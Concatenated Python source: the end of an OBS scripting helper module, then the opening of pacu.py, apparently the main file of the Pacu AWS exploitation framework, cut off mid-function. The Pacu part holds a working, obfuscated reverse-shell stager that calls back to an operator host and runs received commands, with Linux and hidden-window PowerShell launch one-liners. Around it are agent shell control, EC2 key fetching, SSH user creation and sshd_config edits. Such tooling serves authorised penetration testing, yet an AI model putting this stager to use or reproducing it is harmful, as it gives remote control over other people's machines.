raise RuntimeError(self._exception)
elif r is self._INTERRUPT:
raise KeyboardInterrupt(self._exception)
return r
l = self._lock.get("o")
if l is None:
l = threading.Lock()
l.acquire()
l = self._lock.setdefault("o", l)
r = self._result
if r is self._NOTSET:
self._WAITING.append(self)
try:
if not l.acquire(timeout=timeout):
raise TimeoutError()
finally:
self._WAITING.remove(self)
r = self._result
if r is self._NOTSET:
raise TimeoutError()
if r is self._EXCEPTION:
raise RuntimeError(self._exception)
elif r is self._INTERRUPT:
raise KeyboardInterrupt(self._exception)
return r
def set_result(self, value):
self._result = value
l = self._lock.pop("o", None)
if l is not None:
l.release()
def set_exception(self, message):
self._exception = message
self.set_result(self._EXCEPTION)
def interrupt(self, message):
self._exception = message
self.set_result(self._INTERRUPT)
class _SourceReleaser:
def __init__(self, source, returns=None, is_sceneitem=False):
self._source = source
self._returns = returns
self._is_sceneitem = is_sceneitem
def __enter__(self):
return self._returns or self._source
def __exit__(self, exc_type, exc_value, exc_tb):
if self._is_sceneitem:
_obs.obs_sceneitem_release(self._source)
else:
_obs.obs_source_release(self._source)
class Loop:
def __init__(self):
self.steps = []
self.interval = 10
self.steps_per_interval = 10
self._tls = threading.local()
self._tls.abort = Future()
self._tls.is_main = True
self._threads = []
self._started = False
def _process(self):
if not self.steps:
return
todo = self.steps_per_interval
steps = self.steps
while steps and todo > 0:
fn, args, future = steps.pop(0)
try:
r = fn(*args)
if future:
future.set_result(r)
except Exception as ex:
_obs.remove_current_callback()
self._started = False
if future:
future.set_exception(ex)
traceback.print_exc()
return
steps = self.steps
todo -= 1
def start(self):
if not self._started:
self._started = True
_obs.timer_add(self._process, self.interval)
def reset(self):
threads, self._threads = self._threads, []
self.steps = []
for t in threads:
t.interrupt("Resetting")
for f in Future._WAITING:
f.interrupt("Resetting")
self.start()
def schedule(self, cmd, *args, future=None, always=False):
self.schedule_call(getattr(self, "_" + cmd), *args, future=future, always=always)
def schedule_call(self, callable, *args, future=None, always=False):
if not always:
try:
abort = self._tls.abort
except AttributeError:
pass
else:
if abort.has_result():
raise KeyboardInterrupt
if self._tls.is_main:
try:
r = callable(*args)
except Exception as ex:
if future:
future.set_exception(ex)
else:
if future:
future.set_result(r)
return
self.steps.append((callable, args, future))
def _source_by_name(self, name):
s = _obs.obs_get_source_by_name(name)
if not s:
raise LookupError("no source named {}".format(name))
return _SourceReleaser(s)
def _filter_by_name(self, source_name, filter_name):
s = _obs.obs_get_source_by_name(source_name)
if not s:
raise LookupError("no source named {}".format(source_name))
try:
f = _obs.obs_source_get_filter_by_name(s, filter_name)
if not f:
raise LookupError("no filter named {} on source {}".format(filter_name, source_name))
return _SourceReleaser(f)
finally:
_obs.obs_source_release(s)
def _sceneitem_by_name(self, scene_name, name):
with self._source_by_name(scene_name) as source:
scene = _obs.obs_scene_from_source(source)
if not scene:
raise LookupError("no scene named {}".format(scene_name))
i = _obs.obs_scene_find_source_recursive(scene, name)
if i is None:
raise LookupError("no sceneitem named {}".format(name))
_obs.obs_sceneitem_addref(i)
return _SourceReleaser(i, is_sceneitem=True)
def _updated(self, props, data, values, on_update):
for p in props:
values.update(p._get(data))
if on_update:
on_update()
def _new_thread(self, callable):
def _starter():
self._tls.abort = a = Future()
self._tls.is_main = False
self._threads.append(a)
try:
callable()
except KeyboardInterrupt:
pass
t = threading.Thread(target=_starter)
t.start()
def _obs_source_get_type(self, source_name):
with self._source_by_name(source_name) as s:
return _obs.obs_source_get_unversioned_id(s)
def _obs_source_get_property_values(self, source_name):
with self._source_by_name(source_name) as s:
d = _obs.obs_source_get_settings(s)
try:
return _data.get_values(d)
finally:
_obs.obs_data_release(d)
def _obs_source_set_property_values(self, source_name, values):
with self._source_by_name(source_name) as s:
d = _obs.obs_data_create()
try:
_data.set_data(d, values.items())
_obs.obs_source_update(s, d)
finally:
_obs.obs_data_release(d)
def _obs_filter_get_property_values(self, filter_name, owner_name):
with self._filter_by_name(owner_name, filter_name) as s:
d = _obs.obs_source_get_settings(s)
try:
return _data.get_values(d)
finally:
_obs.obs_data_release(d)
def _obs_filter_set_property_values(self, filter_name, owner_name, values):
with self._filter_by_name(owner_name, filter_name) as s:
d = _obs.obs_data_create()
try:
_data.set_data(d, values.items())
_obs.obs_source_update(s, d)
finally:
_obs.obs_data_release(d)
def _obs_source_get_frame_data(self, source_name):
with self._source_by_name(source_name) as s:
return _helper.render_source_to_data(s)
def _close_object(self, obj):
obj.close()
def _obs_sceneitem_get_pos(self, scene_name, source_name):
with self._sceneitem_by_name(scene_name, source_name) as si:
p = _obs.vec2()
_obs.obs_sceneitem_get_pos(si, p)
return p.x, p.y
def _obs_sceneitem_set_pos(self, scene_name, source_name, pos):
with self._sceneitem_by_name(scene_name, source_name) as si:
p = _obs.vec2()
p.x, p.y = pos
_obs.obs_sceneitem_set_pos(si, p)
def _obs_sceneitem_get_crop(self, scene_name, source_name):
with self._sceneitem_by_name(scene_name, source_name) as si:
crop = _obs.obs_sceneitem_crop()
_obs.obs_sceneitem_get_crop(si, crop)
return crop.left, crop.right, crop.top, crop.bottom
def _obs_sceneitem_set_crop(self, scene_name, source_name, crop_sizes):
with self._sceneitem_by_name(scene_name, source_name) as si:
crop = _obs.obs_sceneitem_crop()
crop.left, crop.right, crop.top, crop.bottom = crop_sizes
_obs.obs_sceneitem_set_crop(si, crop)
def _obs_source_get_sync_offset(self, source_name):
with self._source_by_name(source_name) as s:
return _obs.obs_source_get_sync_offset(s)
def _obs_source_set_sync_offset(self, source_name, offset):
with self._source_by_name(source_name) as s:
_obs.obs_source_set_sync_offset(s, offset)
def _obs_source_get_filters(self, source_name, filter_cls):
with self._source_by_name(source_name) as s:
return [filter_cls(n, k)
for n, k in _helper.get_filter_names(s)]
LOOP = Loop()
|
pacu.py
|
#!/usr/bin/env python3
import copy
import importlib
import json
import os
import platform
from queue import Queue
import random
import re
import shlex
import string
import subprocess
import sys
import threading
import time
import traceback
from http.server import BaseHTTPRequestHandler, HTTPServer
try:
import requests
import boto3
import botocore
import configure_settings
import settings
from core.models import AWSKey, PacuSession, ProxySettings
from proxy import PacuProxy
from setup_database import setup_database_if_not_present
from utils import get_database_connection, set_sigint_handler
except ModuleNotFoundError as error:
exception_type, exception_value, tb = sys.exc_info()
print('Traceback (most recent call last):\n{}{}: {}\n'.format(''.join(traceback.format_tb(tb)), str(exception_type), str(exception_value)))
print('Pacu was not able to start because a required Python package was not found.\nRun `sh install.sh` to check and install Pacu\'s Python requirements.')
sys.exit(1)
class Main:
COMMANDS = [
'aws', 'data', 'exec', 'exit', 'help', 'import_keys', 'list', 'load_commands_file',
'ls', 'proxy', 'quit', 'regions', 'run', 'search', 'services', 'set_keys',
'set_regions', 'swap_keys', 'update_regions', 'whoami'
]
def __init__(self):
self.database = None
self.server = None
self.proxy = None
self.queue = None
self.running_module_names = []
# Utility methods
def log_error(self, text, exception_info=None, session=None, local_data=None, global_data=None):
""" Write an error to the file at log_file_path, or a default log file
if no path is supplied. If a session is supplied, its name will be used
to determine which session directory to add the error file to. """
timestamp = time.strftime('%F %T', time.gmtime())
if session:
session_tag = '({})'.format(session.name)
else:
session_tag = '<No Session>'
try:
if session:
log_file_path = 'sessions/{}/error_log.txt'.format(session.name)
else:
log_file_path = 'global_error_log.txt'
print('\n[{}] Pacu encountered an error while running the previous command. Check {} for technical details. [LOG LEVEL: {}]\n\n {}\n'.format(timestamp, log_file_path, settings.ERROR_LOG_VERBOSITY.upper(), exception_info))
log_file_directory = os.path.dirname(log_file_path)
if log_file_directory and not os.path.exists(log_file_directory):
os.makedirs(log_file_directory)
formatted_text = '[{}] {}: {}'.format(timestamp, session_tag, text)
if settings.ERROR_LOG_VERBOSITY.lower() in ('low', 'high', 'extreme'):
if session:
session_data = session.get_all_fields_as_dict()
# Empty values are not valid keys, and that info should be
# preserved by checking for falsiness here.
if session_data.get('secret_access_key'):
session_data['secret_access_key'] = '****** (Censored)'
formatted_text += 'SESSION DATA:\n {}\n'.format(
json.dumps(
session_data,
indent=4,
default=str
)
)
if settings.ERROR_LOG_VERBOSITY.lower() == 'high':
if local_data is not None and global_data is not None:
formatted_text += '\nLAST TWO FRAMES LOCALS DATA:\n {}\n'.format('\n\n '.join(local_data[:2]))
formatted_text += '\nLAST TWO FRAMES GLOBALS DATA:\n {}\n'.format('\n\n '.join(global_data[:2]))
elif settings.ERROR_LOG_VERBOSITY.lower() == 'extreme':
if local_data is not None and global_data is not None:
formatted_text += '\nALL LOCALS DATA:\n {}\n'.format('\n\n '.join(local_data))
formatted_text += '\nALL GLOBALS DATA:\n {}\n'.format('\n\n '.join(global_data))
formatted_text += '\n'
with open(log_file_path, 'a+') as log_file:
log_file.write(formatted_text)
except Exception as error:
print('Error while saving exception information. This means the exception was not added to any error log and should most likely be provided to the developers.\n Exception raised: {}'.format(str(error)))
raise
# @message: String - message to print and/or write to file
# @output: String - where to output the message: both, file, or screen
# @output_type: String - format for message when written to file: plain or xml
# @is_cmd: boolean - Is the log the initial command that was run (True) or output (False)? Devs won't touch this most likely
def print(self, message='', output='both', output_type='plain', is_cmd=False, session_name=''):
session = self.get_active_session()
if session_name == '':
session_name = session.name
# Indent output from a command
if is_cmd is False:
# Add some recursion here to go through the entire dict for
# 'SecretAccessKey'. This is to not print the full secret access
# key into the logs, although this should get most cases currently.
if isinstance(message, dict):
if 'SecretAccessKey' in message:
message = copy.deepcopy(message)
message['SecretAccessKey'] = '{}{}'.format(message['SecretAccessKey'][0:int(len(message['SecretAccessKey']) / 2)], '*' * int(len(message['SecretAccessKey']) / 2))
message = json.dumps(message, indent=2, default=str)
elif isinstance(message, list):
message = json.dumps(message, indent=2, default=str)
# The next section prepends the running module's name in square
# brackets in front of the first line in the message containing
# non-whitespace characters.
if len(self.running_module_names) > 0 and isinstance(message, str):
split_message = message.split('\n')
for index, fragment in enumerate(split_message):
if re.sub(r'\s', '', fragment):
split_message[index] = '[{}] {}'.format(self.running_module_names[-1], fragment)
break
message = '\n'.join(split_message)
if output == 'both' or output == 'file':
if output_type == 'plain':
with open('sessions/{}/cmd_log.txt'.format(session_name), 'a+') as text_file:
text_file.write('{}\n'.format(message))
elif output_type == 'xml':
# TODO: Implement actual XML output
with open('sessions/{}/cmd_log.xml'.format(session_name), 'a+') as xml_file:
xml_file.write('{}\n'.format(message))
pass
else:
print(' Unrecognized output type: {}'.format(output_type))
if output == 'both' or output == 'screen':
print(message)
return True
# @message: String - input question to ask and/or write to file
# @output: String - where to output the message: both or screen (can't write a question to a file only)
# @output_type: String - format for message when written to file: plain or xml
def input(self, message, output='both', output_type='plain', session_name=''):
session = self.get_active_session()
if session_name == '':
session_name = session.name
if len(self.running_module_names) > 0 and isinstance(message, str):
split_message = message.split('\n')
for index, fragment in enumerate(split_message):
if re.sub(r'\s', '', fragment):
split_message[index] = '[{}] {}'.format(self.running_module_names[-1], fragment)
break
message = '\n'.join(split_message)
res = input(message)
if output == 'both':
if output_type == 'plain':
with open('sessions/{}/cmd_log.txt'.format(session_name), 'a+') as file:
file.write('{} {}\n'.format(message, res))
elif output_type == 'xml':
# TODO: Implement actual XML output
# now = time.time()
with open('sessions/{}/cmd_log.xml'.format(session_name), 'a+') as file:
file.write('{} {}\n'.format(message, res))\
else:
print(' Unrecognized output type: {}'.format(output_type))
return res
def validate_region(self, region):
if region in self.get_regions('All'):
return True
return False
def get_regions(self, service, check_session=True):
session = self.get_active_session()
service = service.lower()
with open('./modules/service_regions.json', 'r+') as regions_file:
regions = json.load(regions_file)
# TODO: Add an option for GovCloud regions
if service == 'all':
return regions['all']
if 'aws-global' in regions[service]['endpoints']:
return [None]
if 'all' in session.session_regions:
valid_regions = list(regions[service]['endpoints'].keys())
if 'local' in valid_regions:
valid_regions.remove('local')
return valid_regions
else:
valid_regions = list(regions[service]['endpoints'].keys())
if 'local' in valid_regions:
valid_regions.remove('local')
if check_session is True:
return [region for region in valid_regions if region in session.session_regions]
else:
return valid_regions
def display_all_regions(self, command):
for region in sorted(self.get_regions('all')):
print(' {}'.format(region))
# @data: list
# @module: string
# @args: string
def fetch_data(self, data, module, args, force=False):
session = self.get_active_session()
if data is None:
current = None
else:
current = getattr(session, data[0], None)
for item in data[1:]:
if current is not None and item in current:
current = current[item]
else:
current = None
break
if current is None or current == '' or current == [] or current == {} or current is False:
if force is False:
run_prereq = self.input('Data ({}) not found, run module "{}" to fetch it? (y/n) '.format(' > '.join(data), module), session_name=session.name)
else:
run_prereq = 'y'
if run_prereq == 'n':
return False
if args:
self.exec_module(['exec', module] + args.split(' '))
else:
self.exec_module(['exec', module])
return True
def key_info(self, alias=''):
""" Return the set of information stored in the session's active key
or the session's key with a specified alias, as a dictionary. """
session = self.get_active_session()
if alias == '':
alias = session.key_alias
aws_key = self.get_aws_key_by_alias(alias)
if aws_key is not None:
return aws_key.get_fields_as_camel_case_dictionary()
else:
return False
def print_key_info(self):
self.print(self.key_info())
def print_all_service_data(self, command):
session = self.get_active_session()
services = session.get_all_aws_data_fields_as_dict()
for service in services.keys():
print(' {}'.format(service))
def install_dependencies(self, external_dependencies):
if len(external_dependencies) < 1:
return True
answer = self.input('This module requires external dependencies: {}\n\nInstall them now? (y/n) '.format(external_dependencies))
if answer == 'n':
self.print('Not installing dependencies, exiting...')
return False
self.print('\nInstalling {} total dependencies...'.format(len(external_dependencies)))
for dependency in external_dependencies:
split = dependency.split('/')
name = split[-1]
if name.split('.')[-1] == 'git':
name = name.split('.')[0]
author = split[-2]
if os.path.exists('./dependencies/{}/{}'.format(author, name)):
self.print(' Dependency {}/{} already installed.'.format(author, name))
else:
try:
self.print(' Installing dependency {}/{} from {}...'.format(author, name, dependency))
subprocess.run(['git', 'clone', dependency, './dependencies/{}/{}'.format(author, name)])
except Exception as error:
self.print(' {} failed, view the error below. If you are unsure, some potential causes are that you are missing "git" on your command line, your git credentials are not properly set, or the GitHub link does not exist.'.format(error.cmd))
self.print(' stdout: {}\nstderr: {}'.format(error.cmd, error.stderr))
self.print(' Exiting module...')
return False
else:
if os.path.exists('./dependencies/{}'.format(name)):
self.print(' Dependency {} already installed.'.format(name))
else:
try:
self.print(' Installing dependency {}...'.format(name))
r = requests.get(dependency, stream=True)
if r.status_code == 404:
raise Exception('File not found.')
with open('./dependencies/{}'.format(name), 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
except Exception as error:
self.print(' Downloading {} has failed, view the error below.'.format(dependency))
self.print(error)
self.print(' Exiting module...')
return False
self.print('Dependencies finished installing.')
return True
def get_active_session(self):
""" A wrapper for PacuSession.get_active_session, removing the need to
import the PacuSession model. """
return PacuSession.get_active_session(self.database)
def get_proxy_settings(self):
""" A wrapper for ProxySettings.get_proxy_settings, removing the need
to import the ProxySettings model. """
return ProxySettings.get_proxy_settings(self.database)
def get_aws_key_by_alias(self, alias):
""" Return an AWSKey with the supplied alias that is assigned to the
currently active PacuSession from the database, or None if no AWSKey
with the supplied alias exists. If more than one key with the alias
exists for the active session, an exception will be raised. """
session = self.get_active_session()
key = self.database.query(AWSKey) \
.filter(AWSKey.session_id == session.id) \
.filter(AWSKey.key_alias == alias) \
.scalar()
return key
def start_proxy(self):
proxy_settings = self.get_proxy_settings()
self.create_workers(proxy_settings.ip, proxy_settings.port)
self.create_jobs()
return
# Create the proxy threads
def create_workers(self, proxy_ip, proxy_port):
self.server = PacuProxy()
self.server.prepare_server(self.database)
for _ in range(2):
t = threading.Thread(target=self.work, args=(), daemon=True)
t.daemon = True
t.start()
return
# Handle the next job in queue (one thread handles connections, other sends commands)
def work(self):
while True:
x = self.queue.get()
if x == 1:
self.server.socket_create()
self.server.socket_bind()
self.server.accept_connections()
if x == 5:
break # Shutdown listener called
self.queue.task_done()
return
# Fill the queue with jobs
def create_jobs(self):
for x in [1, 2]: # Job numbers
self.queue.put(x)
return
# Return a PacuProxy stager string
def get_proxy_stager(self, ip, port, os):
python_stager = "import os,platform as I,socket as E,subprocess as B,time as t,sys as X,struct as D\\nV=True\\nY=t.sleep\\nclass A(object):\\n def __init__(self):\\n self.S='{}'\\n self.p={}\\n self.s=None\\n def b(self):\\n try:\\n self.s=E.socket()\\n except:\\n pass\\n return\\n def c(self):\\n try:\\n self.s.connect((self.S,self.p))\\n except:\\n Y(5)\\n raise\\n try:\\n self.s.send('{{}}\\{{}}'.format(I.system(),E.gethostname()).encode())\\n except:\\n pass\\n return\\n def d(self,R):\\n Q=R.encode()\\n self.s.send(D.pack('>I',len(Q))+Q)\\n return\\n def e(self):\\n try:\\n self.s.recv(10)\\n except:\\n return\\n self.s.send(D.pack('>I',0))\\n while V:\\n R=None\\n U=self.s.recv(20480)\\n if U==b'': break\\n elif U[:2].decode('utf-8')=='cd':\\n P=U[3:].decode('utf-8')\\n try:\\n os.chdir(P.strip())\\n except Exception as e:\\n R='e:%s'%str(e)\\n else:\\n R=''\\n elif U[:].decode('utf-8')=='q':\\n self.s.close()\\n X.exit(0)\\n elif len(U)>0:\\n try:\\n T=B.Popen(U[:].decode('utf-8'),shell=V,stdout=B.PIPE,stderr=B.PIPE,stdin=B.PIPE)\\n M=T.stdout.read()+T.stderr.read()\\n R=M.decode('utf-8',errors='replace')\\n except Exception as e:\\n R='e:%s'%str(e)\\n if R is not None:\\n try:\\n self.d(R)\\n except:\\n pass\\n self.s.close()\\n return\\ndef f():\\n C=A()\\n C.b()\\n while V:\\n try:\\n C.c()\\n except:\\n Y(5)\\n else:\\n break\\n try:\\n C.e()\\n except SystemExit:\\n X.exit(0)\\n except:\\n pass\\n C.s.close()\\n return\\nX.stderr=object\\nwhile V:\\n f()".format(ip, port)
if os == 'sh': # Linux one-liner (uses \" to escape inline double-quotes)
return 'python -c "{}" &'.format("exec(\\\"\\\"\\\"{}\\\"\\\"\\\")".format(python_stager))
elif os == 'ps': # Windows one-liner (uses `" to escape inline double-quotes)
return 'Start-Process -FilePath "python" -Verb open -WindowStyle Hidden -ArgumentList "-c {}"'.format('exec(`\"`\"`\"{}`\"`\"`\")'.format(python_stager))
else:
return 'Error: Expected target operating system ("sh" or "ps"), received: {}'.format(os)
def get_ssh_user(self, ssh_username, ssh_password=None):
user_id = ''
if ssh_username is None or ssh_username == '':
new_user = self.input('No SSH user found to create the reverse connection back from the target agent. An SSH user on the PacuProxy server is required to create a valid socks proxy routing through the remote agent. The user will be created with a random 25 character password and a /bin/false shell. Generate that user now? (y/n) ')
if new_user == 'y':
# Create a random username that is randomly 3-9 characters
username = ''.join(random.choices(string.ascii_lowercase, k=int(''.join(random.choices('3456789', k=1)))))
command = 'useradd -l -m -s /bin/false {}'.format(username)
self.print('Running command: {}\n'.format(command))
try:
subprocess.run(command.split(' '))
try:
user_id = subprocess.check_output('id -u {}'.format(username), shell=True).decode('utf-8')
if 'no such user' in user_id:
self.print('[0] Failed to find user after creation. Output from command "id -u {}": {}\n'.format(username, user_id))
return None, None, False
self.print('User {} created! Adding a password...\n'.format(username))
password = ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase + string.digits, k=25))
command = 'echo "{}:{}" | chpasswd'.format(username, password)
try:
subprocess.run(command.split(' '), shell=True)
except Exception as error:
self.print('Failed to add a password...\n')
return username, None, True
return username, password, self.update_sshd_config()
except Exception as error:
self.print('Failed to find user after creation. Output from command "id -u {}": {}\n'.format(username, user_id))
return None, None, False
except Exception as error:
self.print('Failed to create user...')
return None, None, False
else:
return None, None, False
else:
try:
user_id = subprocess.check_output('id -u {}'.format(ssh_username), shell=True).decode('utf-8')
if 'no such user' in user_id:
self.print('Failed to find a valid SSH user. Output from command "id -u {}": {}\n'.format(ssh_username, user_id))
new_user = self.input('An SSH user on the PacuProxy server is required to create a valid socks proxy routing through the remote agent. The user will be created with a random 25 character password and a /bin/false shell. Do you want to generate that user now? (y/n) ')
if new_user == 'y':
return self.get_ssh_user(None, None)
else:
return None, None, False
else:
return ssh_username, ssh_password, False
except Exception as error:
self.print('Failed to find a valid SSH user. Output from command "id -u {}": {}\n'.format(ssh_username, user_id))
new_user = self.input('An SSH user on the PacuProxy server is required to create a valid socks proxy routing through the remote agent. The user will be created with a random 25 character password and a /bin/false shell. Do you want to generate that user now? (y/n) ')
if new_user == 'y':
return self.get_ssh_user(None, None)
else:
return None, None, False
def update_sshd_config(self):
self.print('Ensuring that local port forwarding is disabled (to prevent a "hack back" scenario). This is done by editing /etc/ssh/sshd_config to either add the line or modify the value if the setting already exists: "AllowTcpForwarding remote". This prevents the target server from forwarding our local ports back to them.')
action = ''
with open('/etc/ssh/sshd_config', 'r') as config_file:
contents = config_file.read()
if 'AllowTcpForwarding' in contents:
if 'AllowTcpForwarding remote' in contents:
self.print('Already disabled.')
else:
action = 'replace'
else:
action = 'add'
with open('/etc/ssh/sshd_config', 'w') as config_file:
if action == 'replace':
contents = re.sub(r'.*AllowTcpForwarding.*', 'AllowTcpForwarding remote', contents)
config_file.write(contents)
return True
elif action == 'add':
contents += '\nAllowTcpForwarding remote'
config_file.write(contents)
return True
return False
# Pacu commands and execution
def parse_command(self, command):
command = command.strip()
if command.split(' ')[0] == 'aws':
self.run_aws_cli_command(command)
return
try:
command = shlex.split(command)
except ValueError:
self.print(' Error: Unbalanced quotes in command')
return
if not command or command[0] == '':
return
elif command[0] == 'data':
self.parse_data_command(command)
elif command[0] == 'help':
self.parse_help_command(command)
elif command[0] == 'import_keys':
self.parse_awscli_keys_import(command)
elif command[0] == 'list' or command[0] == 'ls':
self.parse_list_command(command)
elif command[0] == 'load_commands_file':
self.parse_commands_from_file(command)
elif command[0] == 'proxy':
self.parse_proxy_command(command)
elif command[0] == 'regions':
self.display_all_regions(command)
elif command[0] == 'run' or command[0] == 'exec':
self.parse_exec_module_command(command)
elif command[0] == 'search':
self.parse_search_command(command)
elif command[0] == 'services':
self.print_all_service_data(command)
elif command[0] == 'set_keys':
self.set_keys()
elif command[0] == 'set_regions':
self.parse_set_regions_command(command)
elif command[0] == 'swap_keys':
self.swap_keys()
elif command[0] == 'update_regions':
self.update_regions()
elif command[0] == 'whoami':
self.print_key_info()
elif command[0] == 'exit' or command[0] == 'quit':
self.exit()
else:
print(' Error: Unrecognized command')
return
def parse_commands_from_file(self, command):
if len(command) == 1:
self.display_command_help('load_commands_file')
return
commands_file = command[1]
if not os.path.isfile(commands_file):
self.display_command_help('load_commands_file')
return
with open(commands_file, 'r+') as f:
commands = f.readlines()
for command in commands:
print("Executing command: {} ...".format(command))
command_without_space = command.strip()
if command_without_space:
self.parse_command(command_without_space)
def parse_awscli_keys_import(self, command):
if len(command) == 1:
self.display_command_help('import_keys')
return
boto3_session = boto3.session.Session()
if command[1] == '--all':
profiles = boto3_session.available_profiles
for profile_name in profiles:
self.import_awscli_key(profile_name)
return
self.import_awscli_key(command[1])
def import_awscli_key(self, profile_name):
try:
boto3_session = boto3.session.Session(profile_name=profile_name)
creds = boto3_session.get_credentials()
self.set_keys(key_alias='imported-{}'.format(profile_name), access_key_id=creds.access_key, secret_access_key=creds.secret_key, session_token=creds.token)
self.print(' Imported keys as "imported-{}"'.format(profile_name))
except botocore.exceptions.ProfileNotFound as error:
self.print('\n Did not find the AWS CLI profile: {}\n'.format(profile_name))
boto3_session = boto3.session.Session()
print(' Profiles that are available:\n {}\n'.format('\n '.join(boto3_session.available_profiles)))
def run_aws_cli_command(self, command):
try:
result = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT).decode('utf-8')
except subprocess.CalledProcessError as error:
result = error.output.decode('utf-8')
self.print(result)
def parse_data_command(self, command):
session = self.get_active_session()
proxy_settings = self.get_proxy_settings()
if len(command) == 1:
self.print('\nSession data:')
session.print_all_data_in_session()
self.print('\nProxy data:')
proxy = {
'IP': proxy_settings.ip,
'Port': proxy_settings.port,
'Listening': proxy_settings.listening,
'SSHUsername': proxy_settings.ssh_username,
'SSHPassword': proxy_settings.ssh_password,
'TargetAgent': copy.deepcopy(proxy_settings.target_agent)
}
self.print(proxy)
else:
if command[1] == 'proxy':
proxy = {
'IP': proxy_settings.ip,
'Port': proxy_settings.port,
'Listening': proxy_settings.listening,
'SSHUsername': proxy_settings.ssh_username,
'SSHPassword': proxy_settings.ssh_password,
'TargetAgent': copy.deepcopy(proxy_settings.target_agent)
}
self.print(proxy)
elif command[1] not in session.aws_data_field_names:
print(' Service not found.')
elif getattr(session, command[1]) == {} or getattr(session, command[1]) == [] or getattr(session, command[1]) == '':
print(' No data found.')
else:
print(json.dumps(getattr(session, command[1]), indent=2, sort_keys=True, default=str))
def parse_set_regions_command(self, command):
session = self.get_active_session()
if len(command) > 1:
for region in command[1:]:
if region.lower() == 'all':
session.update(self.database, session_regions=['all'])
print(' The region set for this session has been reset to the default of all supported regions.')
return
if self.validate_region(region) is False:
print(' {} is not a valid region.\n Session regions not changed.'.format(region))
return
session.update(self.database, session_regions=command[1:])
print(' Session regions changed: {}'.format(session.session_regions))
else:
print(' Error: set_regions requires either "all" or at least one region to be specified. Try the "regions" command to view all regions.')
def parse_help_command(self, command):
if len(command) <= 1:
self.display_pacu_help()
elif len(command) > 1 and command[1] in self.COMMANDS:
self.display_command_help(command[1])
else:
self.display_module_help(command[1])
def parse_list_command(self, command):
if len(command) == 1:
self.list_modules('')
elif len(command) == 2:
if command[1] in ('cat', 'category'):
self.list_modules('', by_category=True)
def parse_proxy_command(self, command):
proxy_settings = self.get_proxy_settings()
shm_name = proxy_settings.ssh_shm_name
proxy_ip = proxy_settings.ip
proxy_port = proxy_settings.port
proxy_listening = proxy_settings.listening
proxy_ssh_username = proxy_settings.ssh_username
proxy_ssh_password = proxy_settings.ssh_password
proxy_target_agent = copy.deepcopy(proxy_settings.target_agent)
if len(command) == 1 or (len(command) == 2 and command[1] == 'help'): # Display proxy help
self.display_proxy_help()
elif command[1] == 'start': # Start proxy server
if len(command) < 3:
self.print('You need to pass at least an IP address to proxy start: proxy start <ip> [<port>]')
return
if proxy_listening is False:
if len(command) == 4:
proxy_port = command[3]
else:
proxy_port = 80
proxy_ip = command[2]
if proxy_ip == '0.0.0.0':
self.print('Proxy IP must be the public IP of the server to stage agents correctly and not 0.0.0.0. PacuProxy will fallback to listening on 0.0.0.0 if it fails to start a listener on the supplied IP address, but the public IP is required to send to agents so they can contact the server.')
return
print('Starting PacuProxy on {}:{}...'.format(proxy_ip, proxy_port))
proxy_settings.update(self.database, ip=proxy_ip, port=proxy_port)
self.start_proxy()
proxy_listening = True
proxy_settings.update(self.database, listening=proxy_listening)
return
else:
print('Listener already running: {}'.format(self.server))
elif command[1] == 'list' or command[1] == 'ls': # List active agent connections
self.server.list_connections()
elif command[1] == 'shell': # Run shell command on an agent
if len(command) > 3:
self.server.run_cmd(int(command[2]), self.server.all_connections[int(command[2])], ' '.join(command[3:]))
else:
print('** Error: Expected an agent ID and a shell command. Use the format: proxy shell <agent_id> <shell command> **')
elif command[1] == 'fetch_ec2_keys':
if len(command) == 3:
self.fetch_ec2_keys(int(command[2]), self.server.all_connections[int(command[2])])
else:
self.print('** Error: Expected an agent ID. Use the format: proxy fetch_ec2_keys <agent_id> **')
elif command[1] == 'stop': # Stop proxy server
if proxy_listening is False:
print('No listeners are running.')
else:
if not proxy_target_agent == []:
for i, conn in enumerate(self.server.all_connections):
if self.server.all_addresses[i][0] == proxy_target_agent[0]:
if proxy_target_agent[-1].startswith('Windows'):
pass
# self.server.run_cmd(proxy_target_agent[0], self.server.all_connections[i], 'Stop-PortForwardJobs')
# break
else:
self.server.run_cmd(proxy_target_agent[0], self.server.all_connections[i], 'kill -9 $! && rm /dev/shm/{}'.format(shm_name))
break
self.server.quit_gracefully()
self.queue.put(5)
self.server = None
proxy_listening = False
proxy_target_agent = []
elif command[1] == 'kill': # Kill an agent connection
if len(command) == 3:
self.print('** Killing agent {}... **'.format(int(command[2])))
self.server.quit(int(command[2]), self.server.all_connections[int(command[2])])
self.print('** Agent killed **')
elif len(command) == 2:
print('** Error: Expected an agent ID, received nothing. Use format: proxy kill <agent_id> **')
else:
print('** Error: Expected an agent ID, received: {}'.format(command[2:]))
elif command[1] == 'stager':
if len(command) == 3:
self.print(self.get_proxy_stager(proxy_ip, proxy_port, command[2]))
else:
self.print('** Error: Expected target operating system ("sh" or "ps"), received: {}'.format(command[2:]))
elif command[1] == 'use':
if len(command) == 3:
try:
if command[2] == 'none':
self.print('** No longer using a remote PacuProxy agent to route commands. **')
for i, conn in enumerate(self.server.all_connections):
if self.server.all_addresses[i][0] == proxy_target_agent[0]:
if proxy_target_agent[-1].startswith('Windows'):
pass
# self.server.run_cmd(proxy_target_agent[0], self.server.all_connections[i], 'Stop-PortForwardJobs')
# break
else:
self.server.run_cmd(proxy_target_agent[0], self.server.all_connections[i], 'kill -9 $! && rm /dev/shm/{}'.format(shm_name))
break
proxy_target_agent = []
else:
proxy_target_agent = self.server.all_addresses[int(command[2])]
if platform.system() == 'Windows':
self.print('** Windows hosts do not support module proxying. Run PacuProxy on a Linux host for full module proxying capability. **')
return
try:
test = int(command[2])
except:
self.print('** Error: Invalid agent ID, expected an integer or "none", received: {} **'.format(command[2]))
return
print('Setting proxy target to agent {}...'.format(command[2]))
# Find or create an SSH user
proxy_ssh_username, proxy_ssh_password, restart_sshd = self.get_ssh_user(proxy_ssh_username, proxy_ssh_password)
if proxy_ssh_username is None:
self.print('No SSH user on the local PacuProxy server, not routing traffic through the target agent.')
return
if proxy_ssh_password is None:
self.print('Failed to set a password for user {}, not routing traffic through the target agent.'.format(proxy_ssh_username))
return
# If an SSH user was just generated, make sure local port forwarding is disabled
if restart_sshd is True:
